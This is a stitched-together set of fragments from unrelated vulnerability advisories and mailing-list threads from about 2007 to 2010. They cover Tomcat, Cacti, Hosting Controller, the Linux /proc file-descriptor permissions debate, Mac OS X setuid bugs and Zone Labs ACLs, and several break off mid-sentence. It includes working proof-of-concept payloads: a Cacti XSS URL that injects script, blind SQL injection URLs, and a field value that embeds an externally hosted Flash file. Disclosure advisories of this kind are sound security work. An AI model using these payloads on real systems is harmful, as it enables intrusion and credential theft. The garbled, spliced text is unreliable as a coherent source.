Description:
The JULI logging component allows web applications to provide their own
logging configurations. The default security policy does not restrict this
configuration and allows an untrusted web application to add files or
overwrite existing files where the Tomcat process has the necessary file
permissions to do so.
Mitigation:
Apply the following patch to the catalina.policy file
http://svn.apache.org/viewvc?rev=606594&view=rev
The patch will be included in 5.5.25 onwards and 6.0.16 onwards
12- [User] can import unwanted plan or change the plans.
13- [Remote Attacker] can find web site path.
14- [Remote Attacker] can enable or disable all Hosting Controller forums by SQL Injection.
15- [User] can change others' host headers.
[Remote attacker] = (Unauthorized user without any permission or access.)
[User] = (A user with a simple account.)
####################
- Exploits: (or POCs)
####################
http://CACTIHOST/graph.php?action=zoom&local_graph_id=1&graph_end=1%27%20style=visibility:hidden%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx%20y=%27
This vulnerability is only exploitable if the victim is allowed to view
graphs. This will be true if the victim has previously authenticated
against Cacti or if both the guest user has been activated (default:
disabled) and the graph view permission was set to 'guest' (default:
'No User').
This vulnerability was tested with Firefox 3.0.6.
The Cacti group provides a patch to fix this vulnerability:
On Wed, Oct 28, 2009 at 10:30:37PM +0100, Pavel Machek wrote:
> On Tue 2009-10-27 11:49:32, CaT wrote:
> > On Tue, Oct 27, 2009 at 12:29:09AM +0300, Dan Yefimov wrote:
> > > and testing them. Remember the scenario from the original mail and try
> > > finding a window, during which creating a hardlink would still work thus
> > > evading directory permissions check.
> >
> > The main thing this does is allow a hardlink-like attack to work across
> > mountpoints afaics.
>
> Yes, plus it allows "hardlinks" on deleted files, and this "strange
The user can still manually override the charset to UTF-7 via the browser menu, regardless of anything the Apache server sends.
re: "There is no problem to trick the victim and force him to change the encoding of his browser by little social engineering"
For the Apache 403 error page, the only opportunity to "trick" the victim is within the URL itself. It would be quite a feat of social engineering to do this within a URL, between the phrases "You don't have permission to access" and "on this server".
There are many possible malicious strings in UTF-7, and any sequence of character values less than 0x80 starting with a "+" is potentially a UTF-7 string. This is why it is not appropriate for browsers to automatically interpret text as UTF-7. Preventing a user from manually overriding the specified charset and interpreting strings as UTF-7 is not something a web server can do. If you feel this manual function should be disabled in browsers, it may be better to let the browser developers know.
re: percent-encoding the "+" character in URLs
This is forward from lkml, so no, I did not invent this
hole. Unfortunately, I do not think lkml sees this as a security hole,
so...
Jamie Lokier said:
> > > a) the current permission model under /proc/PID/fd has a security
> > > hole (which Jamie is worried about)
> >
> > I believe its bugtraq time. Being able to reopen file with additional
> > permissions looks like a security problem...
> >
X. LEGAL NOTICES
Copyright (c) 2009 Francesco "ascii" Ongaro
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without my express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.
service_getTopicList_story()
in /system/lib-story.php
e.g. the service_submit_staticpages() one allows specifying a dangerous
sp_php flag when submitting "staticpages"; if the staticpages.PHP permission
is set to true for the staticpage admin (not the default), the page will be
evaluated as PHP code.
If not, you can extract the admin hash, then have access to administration
panel by the cookie:
Server could allow an unauthenticated attacker to execute arbitrary
commands in the context of the running server.
The vulnerability is in a function of common.php which is called from
the login.php page. The script fails to sanitize the input when
verifying the user has permission to use the service.
III. ANALYSIS
Successful exploitation allows an attacker to gain complete control over
an affected system. Because the Administration Server runs as an
> material. By submitting the CFP package the author agrees to the
> following terms:
>
> * You confirm that the material submitted is your own except for where
> explicit references to third-party works are made.
> * You confirm that you have obtained permission to use and distribute
> third-party content, like images.
> * You give permission to DEFCON Switzerland to publishing/distributing
> your material either in physical or electronic format without royalty.
> * You give permission to DEFCON Switzerland to create audio and video
> recordings of your presentation and publish/distribute these without
The Realname CCK User Reference Widget module adds a new widget to the
User Reference CCK field type that uses the Realnames for autocompletion
(http://drupal.org/project/realname_userreference).
Only the 'access content' permission is needed to access the page which
displays the user names and real names for users, used by the
autocompletion widget, resulting in an information disclosure
vulnerability.
Systems affected:
session until authentication data has been entered.
We exploited the vulnerability for a customer in order to prove the
possibility of capturing usernames and passwords. One of the possibilities
mentioned above is to embed a remote flash file and grant it the
permission to execute script code.
IV. IMPACT
Impact of the vulnerability depends on the stored data. PMP is often
That said, the user in the example already has access to the file (in
a running process), and would be able to do so again, *if he had
access to a directory where the file was hard-linked*. Pavel
described that the sysadmin checked for that, but even if this worked
as expected, there's a race condition where the user could create the
hard link after the sysadmin checked, but before the permissions were
corrected. Unlikely, I know... but possible.
There's a nearly identical case that works in all Unixen, AFAIK: You
have /a/b/file1, which is writable to user1. The user has permission
to descend /a and /a/b. At some point user1 does a cd to /a/b. Then
It works on Debian 2.6.26 out of the box. It is not an obscure patched
kernel case I am afraid.
If you redirect an FD to a file, using the thus redirected FD in /proc allows you
to bypass directory permissions for where the file is located.
Thankfully, file permissions still apply, so you need an app which has
silly file perms in a bolted-down directory for this.
Symlinking the same file to a link on a normal ext3 or nfs filesystem as
a sanity check shows correct permission behaviour. If you try to write
On 24.10.2009 22:05, Anton Ivanov wrote:
psz@maths.usyd.edu.au wrote:
> > According to POSIX, if you open the directory with O_SEARCH then openat()
> > does not re-check search (+x) permissions.
>
> My 2.6.26 kernel (or Debian lenny) does not seem to know about O_SEARCH.
> But anyway... even if openat() does not re-check permissions, it should
> surely fail when in fact it does not have permissions? Surely, directory
> contents are not cached? Or, do you have an example (of a running OS)
initial read-only.
Do a strace on your test and you will see that the 'file descriptor'
in /proc will be accessed as an ordinary file. After checking the directory
permissions of that particular file, an open will be performed on '/proc/self/fd/0'
and a new O_WRONLY file descriptor is being created.
As Martin Rex already explained yesterday, /proc is all virtual.
arbitrary, externally hosted payload.
Vulnerable Variable Value:
vpid_prefix = "><embed/src="http://www.scip.ch/p/s/w/ccs.swf"
allowScriptAccess=always><a name="
OSX 10.5 "Leopard" has activated ACL use and gives ACLs preference over standard POSIX permission bits. Apple's "Get Info" GUI sets and displays an odd and confusing mix of POSIX and ACL settings, leaving plenty of room for confused security.
Unfortunately, there are not yet adequate tools to detect ACL changes. Tools like open-source Tripwire only check POSIX permission bits (a feature request has been submitted for ACL support in open-source Tripwire). Apple's proprietary Disk Utility appears to only check what Apple wants to check (it probably leaves areas like user files vulnerable).
Historically, a number of legitimate and less-than-legitimate software installers have altered the POSIX permission settings for key system files and directories. Those alterations could easily be extended to ACLs, and would be more difficult to detect, since there are almost no tools to find them.
Users should carefully consider if the risks of using ACLs in OSX outweigh the benefits. For many systems with a small number of users, ACLs are massive overkill, and should probably be disabled. The following command disables ACLs on the root volume (the command only operates on each volume):
# fsaclctl -p / -d
Summary:
A design error vulnerability exists in Adobe Reader and Adobe
Acrobat Professional. A remote attacker who successfully exploits this
vulnerability can control the printer without the user's permission.
Affected Software Versions:
2. Vulnerability:
####################
2.1. There is a SQL Injection in "default.asp". By using it, an attacker can gain usernames and encrypted passwords.
2.1.1. POC:
Check the exploit section.
2.2. There is a logical vulnerability in which an attacker can send email through the site without any permission.
2.2.1. POC:
Check the exploit section.
2.3. There is a SQL Injection in "main_login2.asp". By using it, an attacker can log in to the site.
2.3.1. POC:
Check the exploit section.
parameters. This makes an SQL Injection attack possible. An
example of blind SQL injection (by an authenticated user) follows:
http://www.example.com/cacti/graph_view.php?action=preview&style=selective&graph_list=bla'%20or%20'1'='1
The following request needs admin permission to be executed, so it has
limited impact:
http://www.example.com/cacti/tree.php?action=edit&id=1&subaction=foo&leaf_id=1%20or%201%20=%201
Same as above graph_xport.php is also vulnerable to an SQLi exploitable
III. ANALYSIS
Exploitation of this vulnerability results in the execution of arbitrary
code with root privileges. In order to exploit this vulnerability, an
attacker must have execute permission for the set-uid root mount_smbfs
binary.
IV. DETECTION
iDefense has confirmed the existence of this vulnerability in Mac OS X
III. ANALYSIS
Successful exploitation of this vulnerability results in the execution
of arbitrary code with root privileges. All an attacker needs is a
setuid-root binary and permission to execute it. In a default install,
there are numerous binaries that meet these requirements.
IV. DETECTION
iDefense has confirmed the existence of this vulnerability in Mac OS X
HKEY_CLASSES_ROOT\news\shell
HKEY_CLASSES_ROOT\snews\shell
These keys may be restored under some circumstances. To prevent this
from occurring, set the 'Deny Full Control' permission for the group
'Everyone' on the keys.
VI. VENDOR RESPONSE
Microsoft has addressed this vulnerability within MS07-056. For more
http://www.zonelabs.com/
II. DESCRIPTION
Local exploitation of an insecure permission vulnerability in multiple
Check Point Zone Labs products allows attackers to escalate privileges
or disable protection.
The vulnerability specifically exists in the default file Access Control
List (ACL) settings that are applied during installation. When an
X. LEGAL NOTICES
Copyright © 2010 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.
A1. LEGAL NOTICES
Copyright (c) 2002-2010 scip AG, Switzerland.
Permission is granted for the re-distribution of this alert. It may not
be edited in any way without permission of scip AG.
The information in the advisory is believed to be accurate at the time
of publishing based on currently available information. There are no
warranties with regard to this information. Neither the author nor the